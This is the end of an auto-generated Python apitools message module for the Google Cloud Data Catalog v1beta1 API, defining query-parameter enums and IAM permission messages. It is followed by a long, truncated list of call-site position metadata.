quota purposes for server-side applications. Can be any arbitrary string assigned to a user, but should not exceed 40 characters. trace: A tracing token of the form "token:<tokenid>" to include in api requests. uploadType: Legacy upload protocol for media (e.g. "media", "multipart"). upload_protocol: Upload protocol for media (e.g. "raw", "multipart"). """ class AltValueValuesEnum(_messages.Enum): r"""Data format for response. Values: json: Responses with Content-Type of application/json media: Media download with context-dependent Content-Type proto: Responses with Content-Type of application/x-protobuf """ json = 0 media = 1 proto = 2 class FXgafvValueValuesEnum(_messages.Enum): r"""V1 error format. Values: _1: v1 error format _2: v2 error format """ _1 = 0 _2 = 1 f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1) access_token = _messages.StringField(2) alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json') callback = _messages.StringField(4) fields = _messages.StringField(5) key = _messages.StringField(6) oauth_token = _messages.StringField(7) prettyPrint = _messages.BooleanField(8, default=True) quotaUser = _messages.StringField(9) trace = _messages.StringField(10) uploadType = _messages.StringField(11) upload_protocol = _messages.StringField(12) class TestIamPermissionsRequest(_messages.Message): r"""Request message for `TestIamPermissions` method. Fields: permissions: The set of permissions to check for the `resource`. Permissions with wildcards (such as '*' or 'storage.*') are not allowed. For more information see [IAM Overview](https://cloud.google.com/iam/docs/overview#permissions). """ permissions = _messages.StringField(1, repeated=True) class TestIamPermissionsResponse(_messages.Message): r"""Response message for `TestIamPermissions` method. Fields: permissions: A subset of `TestPermissionsRequest.permissions` that the caller is allowed. """ permissions = _messages.StringField(1, repeated=True) encoding.AddCustomJsonFieldMapping( StandardQueryParameters, 'f__xgafv', '$.xgafv') encoding.AddCustomJsonEnumMapping( StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1') encoding.AddCustomJsonEnumMapping( StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
[((1896, 0, 1897, 51), 'apitools.base.py.encoding.AddCustomJsonFieldMapping', 'encoding.AddCustomJsonFieldMapping', ({(1897, 4, 1897, 27): 'StandardQueryParameters', (1897, 29, 1897, 39): '"""f__xgafv"""', (1897, 41, 1897, 50): '"""$.xgafv"""'}, {}), "(StandardQueryParameters, 'f__xgafv',\n '$.xgafv')", False, 'from apitools.base.py import encoding\n'), ((1898, 0, 1899, 61), 'apitools.base.py.encoding.AddCustomJsonEnumMapping', 'encoding.AddCustomJsonEnumMapping', ({(1899, 4, 1899, 49): 'StandardQueryParameters.FXgafvValueValuesEnum', (1899, 51, 1899, 55): '"""_1"""', (1899, 57, 1899, 60): '"""1"""'}, {}), "(StandardQueryParameters.\n FXgafvValueValuesEnum, '_1', '1')", False, 'from apitools.base.py import encoding\n'), ((1900, 0, 1901, 61), 'apitools.base.py.encoding.AddCustomJsonEnumMapping', 'encoding.AddCustomJsonEnumMapping', ({(1901, 4, 1901, 49): 'StandardQueryParameters.FXgafvValueValuesEnum', (1901, 51, 1901, 55): '"""_2"""', (1901, 57, 1901, 60): '"""2"""'}, {}), "(StandardQueryParameters.\n FXgafvValueValuesEnum, '_2', '2')", False, 'from apitools.base.py import encoding\n'), ((57, 14, 57, 47), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(57, 37, 57, 43): '"""Expr"""', (57, 45, 57, 46): '1'}, {}), "('Expr', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((58, 12, 58, 51), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((59, 9, 59, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(59, 31, 59, 32): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((82, 19, 82, 43), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(82, 41, 82, 42): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((83, 16, 83, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(83, 38, 83, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((102, 17, 102, 41), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(102, 39, 102, 40): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((103, 44, 103, 112), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(103, 67, 103, 108): '"""GoogleCloudDatacatalogV1beta1EntryGroup"""', (103, 110, 103, 111): '2'}, {}), "('GoogleCloudDatacatalogV1beta1EntryGroup', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((104, 11, 104, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((117, 10, 117, 35), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(117, 33, 117, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((118, 9, 118, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((135, 12, 135, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(135, 34, 135, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((136, 39, 136, 102), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(136, 62, 136, 98): '"""GoogleCloudDatacatalogV1beta1Entry"""', (136, 100, 136, 101): '2'}, {}), "('GoogleCloudDatacatalogV1beta1Entry', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((137, 11, 137, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((148, 9, 148, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((163, 24, 163, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(163, 47, 163, 68): '"""GetIamPolicyRequest"""', (163, 70, 163, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((164, 13, 164, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((179, 9, 179, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((199, 39, 199, 102), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(199, 62, 199, 98): '"""GoogleCloudDatacatalogV1beta1Entry"""', (199, 100, 199, 101): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Entry', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((200, 9, 200, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((201, 15, 201, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(201, 37, 201, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((218, 37, 218, 98), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(218, 60, 218, 94): '"""GoogleCloudDatacatalogV1beta1Tag"""', (218, 96, 218, 97): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Tag', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((219, 11, 219, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((232, 9, 232, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((247, 13, 247, 71), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((248, 14, 248, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(248, 36, 248, 37): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((249, 11, 249, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((268, 37, 268, 98), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(268, 60, 268, 94): '"""GoogleCloudDatacatalogV1beta1Tag"""', (268, 96, 268, 97): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Tag', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((269, 9, 269, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((270, 15, 270, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(270, 37, 270, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((286, 13, 286, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((287, 30, 287, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(287, 53, 287, 80): '"""TestIamPermissionsRequest"""', (287, 82, 287, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((301, 24, 301, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(301, 47, 301, 68): '"""GetIamPolicyRequest"""', (301, 70, 301, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((302, 13, 302, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((316, 9, 316, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((317, 13, 317, 37), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(317, 35, 317, 36): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((331, 13, 331, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((332, 24, 332, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(332, 47, 332, 68): '"""SetIamPolicyRequest"""', (332, 70, 332, 71): '2'}, {}), "('SetIamPolicyRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((347, 13, 347, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((348, 30, 348, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(348, 53, 348, 80): '"""TestIamPermissionsRequest"""', (348, 82, 348, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((365, 45, 365, 114), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(365, 68, 365, 110): '"""GoogleCloudDatacatalogV1beta1TagTemplate"""', (365, 112, 365, 113): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplate', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((366, 11, 366, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((367, 18, 367, 42), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(367, 40, 367, 41): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((382, 10, 382, 35), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(382, 33, 382, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((383, 9, 383, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((404, 50, 404, 124), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(404, 73, 404, 120): '"""GoogleCloudDatacatalogV1beta1TagTemplateField"""', (404, 122, 404, 123): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplateField', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((405, 11, 405, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((406, 23, 406, 47), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(406, 45, 406, 46): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((421, 10, 421, 35), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(421, 33, 421, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((422, 9, 422, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((445, 50, 445, 124), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(445, 73, 445, 120): '"""GoogleCloudDatacatalogV1beta1TagTemplateField"""', (445, 122, 445, 123): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplateField', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((446, 9, 446, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((447, 15, 447, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(447, 37, 447, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((462, 63, 462, 150), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(462, 86, 462, 146): '"""GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest"""', (462, 148, 462, 149): '1'}, {}), "(\n 'GoogleCloudDatacatalogV1beta1RenameTagTemplateFieldRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((463, 9, 463, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((477, 24, 477, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(477, 47, 477, 68): '"""GetIamPolicyRequest"""', (477, 70, 477, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((478, 13, 478, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((490, 9, 490, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((509, 45, 509, 114), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(509, 68, 509, 110): '"""GoogleCloudDatacatalogV1beta1TagTemplate"""', (509, 112, 509, 113): '1'}, {}), "('GoogleCloudDatacatalogV1beta1TagTemplate', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((510, 9, 510, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((511, 15, 511, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(511, 37, 511, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((525, 13, 525, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((526, 24, 526, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(526, 47, 526, 68): '"""SetIamPolicyRequest"""', (526, 70, 526, 71): '2'}, {}), "('SetIamPolicyRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((541, 13, 541, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((542, 30, 542, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(542, 53, 542, 80): '"""TestIamPermissionsRequest"""', (542, 82, 542, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((556, 42, 556, 108), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(556, 65, 556, 104): '"""GoogleCloudDatacatalogV1beta1Taxonomy"""', (556, 106, 556, 107): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Taxonomy', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((557, 11, 557, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((568, 9, 568, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((581, 11, 581, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((582, 25, 582, 50), 'apitools.base.protorpclite.messages.BooleanField', '_messages.BooleanField', ({(582, 48, 582, 49): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((583, 15, 583, 54), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((597, 24, 597, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(597, 47, 597, 68): '"""GetIamPolicyRequest"""', (597, 70, 597, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((598, 13, 598, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((608, 9, 608, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((622, 57, 622, 138), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(622, 80, 622, 134): '"""GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest"""', (622, 136, 622, 137): '1'}, {}), "('GoogleCloudDatacatalogV1beta1ImportTaxonomiesRequest',\n 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((623, 11, 623, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((637, 13, 637, 71), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((638, 14, 638, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(638, 36, 638, 37): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((639, 11, 639, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((657, 42, 657, 108), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(657, 65, 657, 104): '"""GoogleCloudDatacatalogV1beta1Taxonomy"""', (657, 106, 657, 107): '1'}, {}), "('GoogleCloudDatacatalogV1beta1Taxonomy', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((658, 9, 658, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((659, 15, 659, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(659, 37, 659, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((673, 43, 673, 110), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(673, 66, 673, 106): '"""GoogleCloudDatacatalogV1beta1PolicyTag"""', (673, 108, 673, 109): '1'}, {}), "('GoogleCloudDatacatalogV1beta1PolicyTag', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((674, 11, 674, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((685, 9, 685, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((700, 24, 700, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(700, 47, 700, 68): '"""GetIamPolicyRequest"""', (700, 70, 700, 71): '1'}, {}), "('GetIamPolicyRequest', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((701, 13, 701, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((711, 9, 711, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((726, 13, 726, 71), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((727, 14, 727, 38), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(727, 36, 727, 37): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((728, 11, 728, 50), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((751, 43, 751, 110), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(751, 66, 751, 106): '"""GoogleCloudDatacatalogV1beta1PolicyTag"""', (751, 108, 751, 109): '1'}, {}), "('GoogleCloudDatacatalogV1beta1PolicyTag', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((752, 9, 752, 48), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((753, 15, 753, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(753, 37, 753, 38): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((768, 13, 768, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((769, 24, 769, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(769, 47, 769, 68): '"""SetIamPolicyRequest"""', (769, 70, 769, 71): '2'}, {}), "('SetIamPolicyRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((785, 13, 785, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((786, 30, 786, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(786, 53, 786, 80): '"""TestIamPermissionsRequest"""', (786, 82, 786, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((800, 13, 800, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((801, 24, 801, 72), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(801, 47, 801, 68): '"""SetIamPolicyRequest"""', (801, 70, 801, 71): '2'}, {}), "('SetIamPolicyRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((816, 13, 816, 52), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((817, 30, 817, 84), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(817, 53, 817, 80): '"""TestIamPermissionsRequest"""', (817, 82, 817, 83): '2'}, {}), "('TestIamPermissionsRequest', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((860, 16, 860, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(860, 38, 860, 39): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((861, 15, 861, 39), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(861, 37, 861, 38): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((862, 13, 862, 37), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(862, 35, 862, 36): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((863, 10, 863, 34), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(863, 32, 863, 33): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((874, 12, 874, 57), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(874, 35, 874, 53): '"""GetPolicyOptions"""', (874, 55, 874, 56): '1'}, {}), "('GetPolicyOptions', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((888, 27, 888, 85), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((906, 12, 906, 36), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(906, 34, 906, 35): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((907, 15, 907, 40), 'apitools.base.protorpclite.messages.IntegerField', '_messages.IntegerField', ({(907, 38, 907, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((908, 16, 908, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(908, 38, 908, 39): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((937, 20, 937, 76), 'apitools.base.protorpclite.messages.EnumField', '_messages.EnumField', ({(937, 40, 937, 72): '"""TableSourceTypeValueValuesEnum"""', (937, 74, 937, 75): '1'}, {}), "('TableSourceTypeValueValuesEnum', 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((938, 14, 938, 81), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(938, 37, 938, 77): '"""GoogleCloudDatacatalogV1beta1TableSpec"""', (938, 79, 938, 80): '2'}, {}), "('GoogleCloudDatacatalogV1beta1TableSpec', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((939, 13, 939, 79), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(939, 36, 939, 75): '"""GoogleCloudDatacatalogV1beta1ViewSpec"""', (939, 77, 939, 78): '3'}, {}), "('GoogleCloudDatacatalogV1beta1ViewSpec', 3)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((958, 11, 958, 35), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(958, 33, 958, 34): '1'}, {}), '(1)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((959, 16, 959, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(959, 38, 959, 39): '2'}, {}), '(2)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((960, 9, 960, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(960, 31, 960, 32): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((961, 15, 961, 100), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', (), '', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((962, 9, 962, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(962, 31, 962, 32): '5'}, {}), '(5)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1027, 28, 1027, 109), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1027, 51, 1027, 105): '"""GoogleCloudDatacatalogV1beta1BigQueryDateShardedSpec"""', (1027, 107, 1027, 108): '1'}, {}), "('GoogleCloudDatacatalogV1beta1BigQueryDateShardedSpec',\n 1)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1028, 22, 1028, 97), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1028, 45, 1028, 93): '"""GoogleCloudDatacatalogV1beta1BigQueryTableSpec"""', (1028, 95, 1028, 96): '2'}, {}), "('GoogleCloudDatacatalogV1beta1BigQueryTableSpec', 2)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1029, 16, 1029, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1029, 38, 1029, 39): '3'}, {}), '(3)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1030, 16, 1030, 40), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1030, 38, 1030, 39): '4'}, {}), '(4)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1031, 19, 1031, 91), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1031, 42, 1031, 87): '"""GoogleCloudDatacatalogV1beta1GcsFilesetSpec"""', (1031, 89, 1031, 90): '5'}, {}), "('GoogleCloudDatacatalogV1beta1GcsFilesetSpec', 5)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1032, 19, 1032, 43), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1032, 41, 1032, 42): '6'}, {}), '(6)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1033, 9, 1033, 33), 'apitools.base.protorpclite.messages.StringField', '_messages.StringField', ({(1033, 31, 1033, 32): '7'}, {}), '(7)', True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1034, 11, 1034, 75), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1034, 34, 1034, 71): '"""GoogleCloudDatacatalogV1beta1Schema"""', (1034, 73, 1034, 74): '8'}, {}), "('GoogleCloudDatacatalogV1beta1Schema', 8)", True, 'from apitools.base.protorpclite import messages as _messages\n'), ((1035, 27, 1035, 101), 'apitools.base.protorpclite.messages.MessageField', '_messages.MessageField', ({(1035, 50, 1035, 97): '"""GoogleCloudDatacatalogV1beta1SystemTimestamps"""', (1035, 